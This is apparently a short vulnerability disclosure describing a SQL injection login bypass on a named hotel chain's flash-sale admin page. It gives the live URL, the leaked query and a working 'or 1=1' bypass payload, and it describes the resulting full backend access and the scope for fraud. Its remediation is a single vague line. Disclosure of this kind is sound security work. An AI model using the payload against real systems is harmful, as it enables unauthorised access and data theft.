SQL Injection and repair due to loose filtering at the backend of hanting hotel chains

The SQL injection at the backend of hanting hotel chains allows users to bypass login restrictions and access the backend.
Problem occurs at this site. http://miaosha.htinns.com/
 
No specific information is written in the title, for fear of intrusion after the release.
 
Background login address: http://miaosha.htinns.com/admin/admin_login.php
 
Enter admin account'
A prompt is displayed after logon, as shown in figure
 
 

 
The query statement is exposed.
 
Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'your e41d218e071ccfb2d1c99ce23906a ''at line 1]
Select * from users_admin where userid = 'admin' and pwd = 'effece41d218e071ccfb2d1c99ce23906a'
 
The focus is here
Select * from users_admin where userid = 'admin' and pwd = 'effece41d218e071ccfb2d1c99ce23906a'
Then construct the bypass
Use the account admin 'or '1' = '1 /*
The system successfully bypasses the login background, as shown below:
 
 
 
 
You have full background permissions... You can obtain all data that has been successfully killed in seconds and perform fraud on the data.
The second kill information can also be published, resulting in a crisis of trust in PR in hanting...
 
No offense. I am also a frequent visitor to hanting. I like your service attitude, that is, the network speed is too slow.
When can I increase the network speed?
 
Solution:

Filter various submissions.
Author only_guest